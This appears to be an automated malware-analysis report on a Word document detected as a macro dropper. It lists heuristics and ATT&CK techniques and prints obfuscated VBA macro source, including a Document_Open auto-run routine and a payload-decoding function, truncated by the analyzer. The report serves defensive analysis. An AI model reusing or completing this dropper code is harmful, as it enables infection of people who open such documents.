Verdict: MALICIOUS
Risk score: 122

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The ClamAV detection name 'Doc.Dropper.Agent-6402733-0' strongly suggests its function as a dropper. The VBA macro code, though partially obfuscated, appears to be responsible for downloading and executing a secondary payload, as indicated by the heuristic firings and the nature of dropper malware.
Heuristics (4)

- ClamAV: Doc.Dropper.Agent-6402733-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6402733-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): a Document_Open macro is present
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eight URLs below are XMP/RDF/DrawingML schema namespace identifiers of the kind routinely carried in embedded image and document metadata, which is consistent with their info-only rating.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12318 bytes |

SHA-256 (macros.bas): 228f84d58a3101f979e8e14a09c57aa074807105b6612049d1e8bdf2e2a753b8
Preview script: first 1,000 lines of the extracted script (shown as extracted; the listing is truncated by the analyzer)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function catalectic(spinuliferous) As String
    Dim conjunctive(63) As Long
    Dim galvanic(6962) As Byte
    Dim entrain As Long
    Dim bactericide As Long
    Dim reproductive As String
    Dim fattism As Long
    Dim awol As Long
    Dim collision(63) As Long
    Dim ebenezer(63) As Long
    Dim fauteuil As Integer
    apocrine = Math.Round(53)
    Dim adverbs() As Byte
    geophysical = 72 - 21 + 257997
    middlebrow = 35 - 114 + 334
    Dim unforgivingly As Long
    cojugation = 74 - 125 + 262195
    redhanded = 122 - 50 + 3960
    luculent = 61 - 81 + 276
    malaise = 122 - 26 + 65184
    Dim aeronautical As String
    Dim aspects As Byte
    metrongr = 118 - 19 + 3997
    trill = 94 - 117 + 87
    bagpipes = 68 - 53 + 16711665
    monoplane = 87 - 99 + 75
    bloodied = 44 - 31 + 16515059
    cave = 6 - 95 + 65625
    Dim rely As String
    beautification = 27 - 38 + 7854
    Dim arteriovenous() As Byte
    arteriovenous = VBA.StrConv(spinuliferous, 120 + 8)
    chlamydomonas = 56 + 5
    Pmt 0, chlamydomonas, 28261, 20939, 3
    sniff = 7843
    elaborately = vbKeyShift - 12
    For dib = 0 To sniff
        If dib Mod 2 = 0 Then
            arteriovenous(dib) = arteriovenous(dib) - elaborately
        Else
            arteriovenous(dib) = arteriovenous(dib) - (elaborately - 1)
        End If
    Next dib
    larrikin = 25 + 35
    Pmt 0, larrikin, 4684, 35195, 3
    fauteuil = 0
    clew = salaam
    For awol = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
        conjunctive(awol) = powderpuff(awol, trill, 70)
        ebenezer(awol) = powderpuff(awol, metrongr, 70)
        collision(awol) = powderpuff(awol, cojugation, 70)
    Next awol
    palpitation = 16 + 45
    Pmt 0, palpitation, 32992, 24036, 4
    adverbs = arteriovenous
    studiousness = 100 - 85 - 11
    hurst = 11 + 30
    Pmt 0, hurst, 14383, 22863, 3
    crying = 121 - 121 + 3
    peltandra = "salvation"
    peltandra = peltandra
    antheridiophore = crying + 1
    dashingly = 116 - 71 - 43
    For bactericide = 0 To sniff
        administer = adverbs(bactericide)
        filariidae = adverbs(bactericide + 2)
        translate = ebenezer(clew(adverbs(bactericide + 1)))
        spicebush = conjunctive(clew(filariidae)) + clew(adverbs(bactericide + crying))
        entrain = collision(clew(administer)) + translate + spicebush
        awol = powderpuff(entrain, bagpipes, 62)
        galvanic(fattism) = powderpuff(awol, cave, 52)
        awol = powderpuff(entrain, malaise, 62)
        galvanic(fattism + 1) = powderpuff(awol, luculent, 52)
        galvanic(fattism + dashingly) = powderpuff(entrain, middlebrow, 62)
        fattism = fattism + dashingly + 1
        bactericide = bactericide + 3
    Next
    catalectic = galvanic
End Function

' Auto-run entry point: executes when the document is opened (OLE_VBA_DOCOPEN)
Private Sub Document_Open()
    Dim broussonetia As Variant
    Dim commodore As Long
    logometer = newsworthy
    loricata
    suite = 21 + 59
    Pmt 0, suite, 18768, 50729, 4
End Sub

Function loricata()
    Dim chiropractic As Long
    Dim lepisosteus As Variant
    judaic.illstarred.Value = Day(#12/5/2013#)
    varday = cashbox = "precedented"
    oxbridge = "catholic"
    populousness = "marte"
    tracing = cajanus
    archery = "barterer"
    fistulous = "emancipator"
    buddy = "minnows"
    Set bottomless = judaic.illstarred.SelectedItem
    fanatical = 39 + 7
    Pmt 0, fanatical, 16054, 10254, 3
    intraspecies = bottomless.Name
    undress = 7 - 117 + 7954
    leguminosae = Right(intraspecies, undress)
    attroupement = catalectic(leguminosae)
    courts = 47 + 56
    Pmt 0, courts, 16440, 53729, 4
    thecodont = "graphotype"
    ' Conditional compilation: separate declarations for 64-bit and 32-bit Office
    #If (61 - 72 + 411 + 57 - 4 + 247) > ((36 - 85 + 369) - (54 - 91 + 577) * 1) And ((35 - 16 + 9) - (62 - 41 + 7)) * 2 < (Win64) Then
        Dim muniment As Variant
        Dim georgia As LongPtr
        Dim exequies As LongPtr
        Dim ramekin As Long
    #ElseIf (65 - 88 + 423 + 111 - 87 + 276) > ((55 - 111 + 376) - (4 - 54 + 590) * 1) And Not ((31 - 104 + 101) - (24 - 40 + 44)) * 2 < (Win64) Then
        Dim calvados As String
        Dim exequies As Long
        Dim giddyhead As Byte
        Dim georgia As Long
    #End If
    adulterating = 78 - 80 + 2
    levies = tamarind
    cardiomegaly = guadagna
    cartel ... (truncated)
```